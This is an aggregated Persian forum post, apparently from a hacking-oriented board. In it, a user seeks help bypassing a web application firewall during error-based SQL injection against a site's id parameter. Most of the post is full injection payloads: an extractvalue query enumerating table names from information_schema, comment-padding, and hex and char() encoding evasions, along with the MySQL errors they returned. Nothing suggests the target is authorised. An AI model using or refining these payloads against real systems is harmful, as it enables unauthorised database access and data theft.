Quantcast
Channel: انجمن گروه آشیانه - آموزش امنیت و راه های مقابله با هک
Viewing all articles
Browse latest Browse all 19202

bypass xpath

$
0
0
با سلام

من وقتی می خوام xpath بزنم به مشکل Forbidden میخورم با ادرس زیر
کد:

id=1%20and%20extractvalue(rand(),(select+table_name+from+/**/information_schema.tables/**/+where+table_schema=database()+limit+0,1))--
مشکل فهمیدم از information_schema.tables قسمت است

را حل hex و را حل char رو هم رفتم ولی بعدش این دو خطا رو دارم

hex :

کد:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''696e666f726d6174696f6e5f736368656d612e7461626c6573' where table_schema=database' at line 1
خطا:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''696e666f726d6174696f6e5f736368656d612e7461626c65 73' where table_schema=database' at line 1


char:

کد:

id=1%20and%20extractvalue(rand(),(select+table_name+from+/**/char(105,110,102,111,114,109,97,116,105,111,110,95,115,99,104,101,109,97,46,116,97,98,108,101,115)/**/+where+table_schema=database()+limit+0,1))--
خطا:

کد:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'from /**/char(105,110,102,111,114,109,97,116,105,111,110,95,115,99,104,101,109,9' at line 1

راحل دوستان؟؟؟

Viewing all articles
Browse latest Browse all 19202

Trending Articles



<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>